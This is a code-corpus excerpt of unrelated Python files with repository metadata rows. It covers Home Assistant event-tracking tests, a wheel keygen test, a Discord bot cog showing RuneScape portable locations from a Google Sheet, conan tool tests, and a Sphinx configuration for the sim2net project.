async_track_state_change(hass, MATCH_ALL, wildercard_run_callback)
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(specific_runs) == 0
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
assert wildcard_runs[-1][0] is None
assert wildcard_runs[-1][1] is not None
# Set same state should not trigger a state change/listener
hass.states.async_set('light.Bowl', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 0
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
# State change off -> on
hass.states.async_set('light.Bowl', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 2
assert len(wildercard_runs) == 2
# State change off -> off
hass.states.async_set('light.Bowl', 'off', {"some_attr": 1})
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 3
assert len(wildercard_runs) == 3
# State change off -> on
hass.states.async_set('light.Bowl', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 4
assert len(wildercard_runs) == 4
hass.states.async_remove('light.bowl')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 5
assert len(wildercard_runs) == 5
assert wildcard_runs[-1][0] is not None
assert wildcard_runs[-1][1] is None
assert wildercard_runs[-1][0] is not None
assert wildercard_runs[-1][1] is None
# Set state for different entity id
hass.states.async_set('switch.kitchen', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 5
assert len(wildercard_runs) == 6
async def test_track_template(hass):
"""Test tracking template."""
specific_runs = []
wildcard_runs = []
wildercard_runs = []
template_condition = Template(
"{{states.switch.test.state == 'on'}}",
hass
)
template_condition_var = Template(
"{{states.switch.test.state == 'on' and test == 5}}",
hass
)
hass.states.async_set('switch.test', 'off')
def specific_run_callback(entity_id, old_state, new_state):
specific_runs.append(1)
async_track_template(hass, template_condition, specific_run_callback)
@ha.callback
def wildcard_run_callback(entity_id, old_state, new_state):
wildcard_runs.append((old_state, new_state))
async_track_template(hass, template_condition, wildcard_run_callback)
@asyncio.coroutine
def wildercard_run_callback(entity_id, old_state, new_state):
wildercard_runs.append((old_state, new_state))
async_track_template(
hass, template_condition_var, wildercard_run_callback,
{'test': 5})
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'off')
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
assert len(wildercard_runs) == 1
hass.states.async_set('switch.test', 'on')
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 2
assert len(wildercard_runs) == 2
async def test_track_same_state_simple_trigger(hass):
"""Test track_same_change with trigger simple."""
thread_runs = []
callback_runs = []
coroutine_runs = []
period = timedelta(minutes=1)
def thread_run_callback():
thread_runs.append(1)
async_track_same_state(
hass, period, thread_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
@ha.callback
def callback_run_callback():
callback_runs.append(1)
async_track_same_state(
hass, period, callback_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
@asyncio.coroutine
def coroutine_run_callback():
coroutine_runs.append(1)
async_track_same_state(
hass, period, coroutine_run_callback,
lambda _, _2, to_s: to_s.state == 'on')
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(thread_runs) == 0
assert len(callback_runs) == 0
assert len(coroutine_runs) == 0
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(thread_runs) == 1
assert len(callback_runs) == 1
assert len(coroutine_runs) == 1
async def test_track_same_state_simple_no_trigger(hass):
"""Test track_same_change with no trigger."""
callback_runs = []
period = timedelta(minutes=1)
@ha.callback
def callback_run_callback():
callback_runs.append(1)
async_track_same_state(
hass, period, callback_run_callback,
lambda _, _2, to_s: to_s.state == 'on',
entity_ids='light.Bowl')
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(callback_runs) == 0
# Change state on state machine
hass.states.async_set("light.Bowl", "off")
await hass.async_block_till_done()
assert len(callback_runs) == 0
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(callback_runs) == 0
async def test_track_same_state_simple_trigger_check_funct(hass):
"""Test track_same_change with trigger and check funct."""
callback_runs = []
check_func = []
period = timedelta(minutes=1)
@ha.callback
def callback_run_callback():
callback_runs.append(1)
@ha.callback
def async_check_func(entity, from_s, to_s):
check_func.append((entity, from_s, to_s))
return True
async_track_same_state(
hass, period, callback_run_callback,
entity_ids='light.Bowl', async_check_same_func=async_check_func)
# Adding state to state machine
hass.states.async_set("light.Bowl", "on")
await hass.async_block_till_done()
assert len(callback_runs) == 0
assert check_func[-1][2].state == 'on'
assert check_func[-1][0] == 'light.bowl'
# change time to track and see if they trigger
future = dt_util.utcnow() + period
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert len(callback_runs) == 1
async def test_track_time_interval(hass):
"""Test tracking time interval."""
specific_runs = []
utc_now = dt_util.utcnow()
unsub = async_track_time_interval(
hass, lambda x: specific_runs.append(1),
timedelta(seconds=10)
)
_send_time_changed(hass, utc_now + timedelta(seconds=5))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, utc_now + timedelta(seconds=13))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, utc_now + timedelta(minutes=20))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
_send_time_changed(hass, utc_now + timedelta(seconds=30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
async def test_track_sunrise(hass):
"""Test track the sunrise."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
hass.config.latitude = latitude
hass.config.longitude = longitude
assert await async_setup_component(hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = datetime(2014, 5, 24, 12, 0, 0, tzinfo=dt_util.UTC)
utc_today = utc_now.date()
mod = -1
while True:
next_rising = (astral.sunrise_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_rising > utc_now:
break
mod += 1
# Track sunrise
runs = []
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub = async_track_sunrise(hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub2 = async_track_sunrise(hass, lambda: offset_runs.append(1),
offset)
# run tests
_send_time_changed(hass, next_rising - offset)
await hass.async_block_till_done()
assert len(runs) == 0
assert len(offset_runs) == 0
_send_time_changed(hass, next_rising)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 0
_send_time_changed(hass, next_rising + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
unsub()
unsub2()
_send_time_changed(hass, next_rising + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
async def test_track_sunset(hass):
"""Test track the sunset."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
hass.config.latitude = latitude
hass.config.longitude = longitude
assert await async_setup_component(hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = datetime(2014, 5, 24, 12, 0, 0, tzinfo=dt_util.UTC)
utc_today = utc_now.date()
mod = -1
while True:
next_setting = (astral.sunset_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_setting > utc_now:
break
mod += 1
# Track sunset
runs = []
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub = async_track_sunset(hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
with patch('homeassistant.util.dt.utcnow', return_value=utc_now):
unsub2 = async_track_sunset(
hass, lambda: offset_runs.append(1), offset)
# Run tests
_send_time_changed(hass, next_setting - offset)
await hass.async_block_till_done()
assert len(runs) == 0
assert len(offset_runs) == 0
_send_time_changed(hass, next_setting)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 0
_send_time_changed(hass, next_setting + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
unsub()
unsub2()
_send_time_changed(hass, next_setting + offset)
await hass.async_block_till_done()
assert len(runs) == 1
assert len(offset_runs) == 1
async def test_async_track_time_change(hass):
"""Test tracking time change."""
wildcard_runs = []
specific_runs = []
unsub = async_track_time_change(hass,
lambda x: wildcard_runs.append(1))
unsub_utc = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), second=[0, 30])
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 15))
await hass.async_block_till_done()
assert len(specific_runs) == 1
assert len(wildcard_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 3
unsub()
unsub_utc()
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 30))
await hass.async_block_till_done()
assert len(specific_runs) == 2
assert len(wildcard_runs) == 3
async def test_periodic_task_minute(hass):
"""Test periodic tasks per minute."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), minute='/5',
second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 12, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 3, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 12, 5, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
_send_time_changed(hass, datetime(2014, 5, 24, 12, 5, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
async def test_periodic_task_hour(hass):
"""Test periodic tasks per hour."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2',
minute=0, second=0)
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 23, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 25, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 25, 1, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
unsub()
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
async def test_periodic_task_wrong_input(hass):
"""Test periodic tasks with wrong input."""
specific_runs = []
with pytest.raises(ValueError):
async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/two')
_send_time_changed(hass, datetime(2014, 5, 2, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 0
async def test_periodic_task_clock_rollback(hass):
"""Test periodic tasks with the time rolling backwards."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2', minute=0,
second=0)
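    # Every matching time event fires the callback, even when the clock
    # has rolled backwards.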
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 23, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
_send_time_changed(hass, datetime(2014, 5, 24, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 3
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 4
unsub()
_send_time_changed(hass, datetime(2014, 5, 25, 2, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 4
async def test_periodic_task_duplicate_time(hass):
"""Test periodic tasks not triggering on duplicate time."""
specific_runs = []
unsub = async_track_utc_time_change(
hass, lambda x: specific_runs.append(1), hour='/2', minute=0,
second=0)
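    # Firing the exact same matching time twice should only trigger once.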
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 24, 22, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, datetime(2014, 5, 25, 0, 0, 0))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
async def test_periodic_task_entering_dst(hass):
"""Test periodic task behavior when entering dst."""
tz = dt_util.get_time_zone('Europe/Vienna')
dt_util.set_default_time_zone(tz)
specific_runs = []
unsub = async_track_time_change(
hass, lambda x: specific_runs.append(1), hour=2, minute=30,
second=0)
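    # Spring forward: on 2018-03-25 clocks in Europe/Vienna jump from
    # 02:00 to 03:00, so a 02:30 local trigger never occurs that day.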
_send_time_changed(hass, tz.localize(datetime(2018, 3, 25, 1, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 25, 3, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 26, 1, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 3, 26, 2, 50, 0)))
await hass.async_block_till_done()
assert len(specific_runs) == 1
unsub()
async def test_periodic_task_leaving_dst(hass):
"""Test periodic task behavior when leaving dst."""
tz = dt_util.get_time_zone('Europe/Vienna')
dt_util.set_default_time_zone(tz)
specific_runs = []
unsub = async_track_time_change(
hass, lambda x: specific_runs.append(1), hour=2, minute=30,
second=0)
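    # Fall back: on 2018-10-28 clocks go from 03:00 back to 02:00, so the
    # 02:00-03:00 local hour occurs twice (first in DST, then standard time).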
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 5, 0),
is_dst=False))
await hass.async_block_till_done()
assert len(specific_runs) == 0
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 55, 0),
is_dst=False))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 5, 0),
is_dst=True))
await hass.async_block_till_done()
assert len(specific_runs) == 1
_send_time_changed(hass, tz.localize(datetime(2018, 10, 28, 2, 55, 0),
is_dst=True))
await hass.async_block_till_done()
assert len(specific_runs) == 2
unsub()
async def test_call_later(hass):
"""Test calling an action later."""
def action():
pass
now = datetime(2017, 12, 19, 15, 40, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.event'
'.async_track_point_in_utc_time') as mock, \
patch('homeassistant.util.dt.utcnow', return_value=now):
async_call_later(hass, 3, action)
assert len(mock.mock_calls) == 1
p_hass, p_action, p_point = mock.mock_calls[0][1]
assert p_hass is hass
assert p_action is action
assert p_point == now + timedelta(seconds=3)
async def test_async_call_later(hass):
"""Test calling an action later."""
def action():
pass
now = datetime(2017, 12, 19, 15, 40, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.event'
'.async_track_point_in_utc_time') as mock, \
patch('homeassistant.util.dt.utcnow', return_value=now):
remove = async_call_later(hass, 3, action)
assert len(mock.mock_calls) == 1
p_hass, p_action, p_point = mock.mock_calls[0][1]
assert p_hass is hass
assert p_action is action
assert p_point == now + timedelta(seconds=3)
assert remove is mock()
| jnewland/home-assistant | tests/helpers/test_event.py | Python | apache-2.0 | 23,251 |
from .. import tool
def test_keygen():
def get_keyring():
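        # Build stub WheelKeys/keyring replacements so keygen() neither
        # writes key files nor touches a real keyring backend.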
WheelKeys, keyring = tool.get_keyring()
class WheelKeysTest(WheelKeys):
def save(self):
pass
class keyringTest:
backend = keyring.backend
class backends:
file = keyring.backends.file
@classmethod
def get_keyring(cls):
class keyringTest2:
pw = None
def set_password(self, a, b, c):
self.pw = c
def get_password(self, a, b):
return self.pw
return keyringTest2()
return WheelKeysTest, keyringTest
tool.keygen(get_keyring=get_keyring)
| ARMmbed/yotta_osx_installer | workspace/lib/python2.7/site-packages/wheel/test/test_tool.py | Python | apache-2.0 | 819 |
from secret import GOOGLE_API_KEY
from datetime import datetime
from util.arguments import Arguments
from discord.ext import commands
from shlex import split
from util.choices import enum
from collections import namedtuple
import util
import re
import urllib.parse
import discord
class Portables:
def __init__(self, bot):
self.bot = bot
@staticmethod
def _format_data(json):
date_format = '%d %b, %H:%M'
struct = namedtuple('Portable', ['author', 'last_updated', 'locations', 'time'])
# Populating portables
time = datetime.strptime(json['values'][2][1], date_format).replace(year=datetime.utcnow().year)
author = json['values'][2][3]
last_updated = util.format_timedelta(datetime.utcnow() - time, short_names=True)
locations = {'fletchers': {}, 'crafters': {}, 'braziers': {}, 'sawmills': {}, 'forges': {}, 'ranges': {}, 'wells': {}}
# Finding all worlds for portables
for i in range(7):
worlds = locations[json['values'][0][i].strip().lower()]
locs = json['values'][1][i]
# Checking if no worlds
if 'host needed' in locs.lower() or 'n/a' in locs.lower():
continue
# Separating locations
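            # Each entry is a run of world numbers followed by a location code,
            # e.g. '84 100 CA'; codes: CA, MG, PRIFF/PRIF/P, BU, SP, CW, BA.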
            for location in re.findall(r'\d+.+?(?:CA|MG|PRIFF|PRIF|P|BU|SP|CW|BA)', locs.upper()):
                name = location.split(' ')[-1]
                name = re.sub(r'(?:PRIFF|PRIF)', 'P', name, flags=re.I)
                worlds[name] = re.findall(r'\d+', location)
return struct(author=author, locations=locations, last_updated=last_updated, time=time)
@staticmethod
async def _get_portables(http):
"""
Gets data from the google spreadsheet
"""
host = 'https://sheets.googleapis.com/v4/spreadsheets'
sheet_id = '16Yp-eLHQtgY05q6WBYA2MDyvQPmZ4Yr3RHYiBCBj2Hc'
sheet_name = 'Home'
        cell_range = 'A16:G18'
        url = '%s/%s/values/%s!%s?key=%s' % (host, sheet_id, sheet_name, cell_range, GOOGLE_API_KEY)
# Getting cells
async with http.get(url) as r:
# Checking request
if r.status != 200:
return None
return Portables._format_data(await r.json())
@commands.command(pass_context=True, aliases=['ports', 'port', 'portable'], description='Shows portable locations.')
async def portables(self, ctx, *, msg: str = ''):
ports = {
'fletcher': ('fletchers', 'fletch'),
'crafter': ('crafters', 'craft'),
'brazier': ('braziers', 'braz'),
'sawmill': ('saw', 'mill', 'sawmills'),
'forge': ('forges',),
'range': ('ranges', 'cook'),
'well': ('wells',)
}
parser = Arguments(allow_abbrev=False, prog='portables')
parser.add_argument('portable', nargs='?', type=enum(**ports), help='Selects a type of portable to search for.')
# Parsing arguments
await self.bot.send_typing(ctx.message.channel)
try:
args = parser.parse_args(split(msg))
except SystemExit:
await self.bot.say('```%s```' % parser.format_help())
return
except Exception as e:
await self.bot.say('```%s```' % str(e))
return
# Get portables from google sheet
portables = await Portables._get_portables(self.bot.whttp)
if not portables:
await self.bot.say('Google sheet could not be reached.')
return
# Building message
e = discord.Embed()
e.colour = 0x3572a7
e.timestamp = portables.time
e.set_footer(text='Updated %s ago' % portables.last_updated)
e.set_author(name=portables.author,
icon_url='http://services.runescape.com/m=avatar-rs/%s/chat.png' % urllib.parse.quote(portables.author))
# Adding portable locations
for portable, locations in portables.locations.items():
            # Skip if this is not the portable that was requested
if args.portable and args.portable not in portable:
continue
# No location for portable
if not locations:
e.add_field(name=portable.capitalize(), value='N/A')
continue
value = '\n'.join(['%s %s' % (', '.join(worlds), location) for location, worlds in locations.items()])
e.add_field(name=portable.capitalize(), value=value)
await self.bot.say(embed=e)
def setup(bot):
bot.add_cog(Portables(bot))
| duke605/RunePy | commands/portables.py | Python | mit | 4,554 |
import unittest
from conans.tools import SystemPackageTool, replace_in_file
import os
from conans.test.utils.test_files import temp_folder
from conans import tools
class RunnerMock(object):
def __init__(self):
self.command_called = None
def __call__(self, command, output):
self.command_called = command
class ReplaceInFileTest(unittest.TestCase):
def setUp(self):
text = u'J\xe2nis\xa7'
self.tmp_folder = temp_folder()
self.win_file = os.path.join(self.tmp_folder, "win_encoding.txt")
text = text.encode("Windows-1252", "ignore")
with open(self.win_file, "wb") as handler:
handler.write(text)
self.bytes_file = os.path.join(self.tmp_folder, "bytes_encoding.txt")
with open(self.bytes_file, "wb") as handler:
handler.write(text)
def test_replace_in_file(self):
replace_in_file(self.win_file, "nis", "nus")
replace_in_file(self.bytes_file, "nis", "nus")
with open(self.win_file, "rt") as handler:
content = handler.read()
self.assertNotIn("nis", content)
self.assertIn("nus", content)
with open(self.bytes_file, "rt") as handler:
content = handler.read()
self.assertNotIn("nis", content)
self.assertIn("nus", content)
class ToolsTest(unittest.TestCase):
def cpu_count_test(self):
cpus = tools.cpu_count()
self.assertIsInstance(cpus, int)
self.assertGreaterEqual(cpus, 1)
def system_package_tool_test(self):
runner = RunnerMock()
spt = SystemPackageTool(runner=runner)
# fake os info to linux debian, default sudo
spt._os_info.is_linux = True
spt._os_info.linux_distro = "debian"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "ubuntu"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "knoppix"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "fedora"
spt.update()
self.assertEquals(runner.command_called, "sudo yum check-update")
spt._os_info.linux_distro = "redhat"
spt.install("a_package")
self.assertEquals(runner.command_called, "sudo yum install -y a_package")
spt._os_info.linux_distro = "debian"
spt.install("a_package")
self.assertEquals(runner.command_called, "sudo apt-get install -y a_package")
spt._os_info.is_macos = True
spt._os_info.is_linux = False
spt.update()
self.assertEquals(runner.command_called, "brew update")
spt.install("a_package")
self.assertEquals(runner.command_called, "brew install a_package")
os.environ["CONAN_SYSREQUIRES_SUDO"] = "False"
spt = SystemPackageTool(runner=runner)
spt._os_info.is_linux = True
spt._os_info.linux_distro = "redhat"
spt.install("a_package")
self.assertEquals(runner.command_called, "yum install -y a_package")
spt.update()
self.assertEquals(runner.command_called, "yum check-update")
spt._os_info.linux_distro = "ubuntu"
spt.install("a_package")
self.assertEquals(runner.command_called, "apt-get install -y a_package")
spt.update()
self.assertEquals(runner.command_called, "apt-get update")
spt._os_info.is_macos = True
spt._os_info.is_linux = False
spt.update()
self.assertEquals(runner.command_called, "brew update")
spt.install("a_package")
self.assertEquals(runner.command_called, "brew install a_package")
del os.environ["CONAN_SYSREQUIRES_SUDO"]
| dragly/conan | conans/test/tools_test.py | Python | mit | 3,849 |
# -*- coding: utf-8 -*-
# (c) 2012-2014 Michal Kalewski <mkalewski at cs.put.poznan.pl>
#
# This file is a part of the Simple Network Simulator (sim2net) project.
# USE, MODIFICATION, COPYING AND DISTRIBUTION OF THIS SOFTWARE IS SUBJECT TO
# THE TERMS AND CONDITIONS OF THE MIT LICENSE. YOU SHOULD HAVE RECEIVED A COPY
# OF THE MIT LICENSE ALONG WITH THIS SOFTWARE; IF NOT, YOU CAN DOWNLOAD A COPY
# FROM HTTP://WWW.OPENSOURCE.ORG/.
#
# For bug reports, feature and support requests please visit
# <https://github.com/mkalewski/sim2net/issues>.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.append('.')
# -- General configuration ----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.doctest',
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.mathjax'
]
mathjax_path = 'https://c328740.ssl.cf1.rackcdn.com/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
autoclass_content = 'both'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sim2net'
copyright = u'(c) 2012-2014 Michal Kalewski'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '0.0.1'
# The full version, including alpha/beta/rc tags.
# release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {'nosidebar': True}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Simple Network Simulator'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'SimpleNetworkSimulatorsim2netdoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'SimpleNetworkSimulatorsim2net.tex',
u'Simple Network Simulator (sim2net) Documentation', u'Michal Kalewski',
'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'simplenetworksimulatorsim2net',
u'Simple Network Simulator (sim2net) Documentation',
[u'Michal Kalewski'], 1)
]
| mkalewski/sim2net | docs/conf.py | Python | mit | 7,543 |